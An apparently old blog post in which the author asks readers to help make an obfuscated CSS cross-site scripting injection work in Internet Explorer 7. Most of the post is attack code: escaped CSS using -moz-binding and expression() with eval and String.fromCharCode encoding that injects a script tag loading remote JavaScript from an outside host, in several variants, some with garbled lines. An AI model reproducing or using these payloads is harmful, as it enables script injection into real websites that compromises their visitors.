Filed under: security
OK, I had to do this…
After (2 long) days of testing a re-testing I was forced by circumstances to create this blog dedicated to understanding Ultimate XSS CSS injection and because I didn’t want to make that awesome page a mess with my comments.
So this page is dedicated to those people who can and will help me solve this – especially
The facts:
We have this XSS injection “hackvectoreted” below:
<div style=”\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);” id=”inject”>test</div>
<html>
<body>
<link rel=”stylesheet” type=”text/css” href=”test.css” mce_href=”test.css”>
<div id=”navigation”>– Test –</div>
</body>
</html>
And a css file named test.css like this one below (remember line breaks):
div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\
.xml\#xss);xx: e\xp\r
5\s\s\i\o\n((
7indow.r!=1) 
F eval('x=Str
9ng.fromCharC
Fde;scr=docum
5nt.createEle
Dent(x(115,99
C114,105,112,
116));scr.set
1ttribute(x(1
15,114,99),x(
104,116,116,1
12,58,47,47,9
8,117,115,105
C110,101,115,
115,105,110,1
02,111,46,99,
111,46,117,10
7,47,108,97,9
8,115,47,120,
115,115,47,12
0,115,115,46,
106,115));doc
5ment.getElem
5ntById(x( 10
5,110,106,101
C99,116 )).ap
0endChild(scr
9;window.r=1;
7) : 1);
}
Now we run a test – FF shows what it was supposed to show “XBL XSS” and this means it works BUT IE70 does nothing instead of running this js code http://businessinfo.co.uk/labs/xss/xss.js well hidden with <@tocharcodes> and <@hex_ent> using the hackvector
You can test this by using FF or IE7 here.
Of course I’ve tried many many different variations of this XSS injection and googled till my eyes blowened out but none of them worked – at least not for IE70. I had to admit I’ve learned something about the css’s becasue I was 0 here but right now I’m just tired of learning and need an answer so please make my day and give me the answer and if you do please make sure the last noob on earth will understand this.
Other variations of the test.css file you’ll find below:
div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’) : 1);
}
OR
div#navigation
{
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’) : 1);
}
I ask for 5 minutes off your time and I welcome your comments
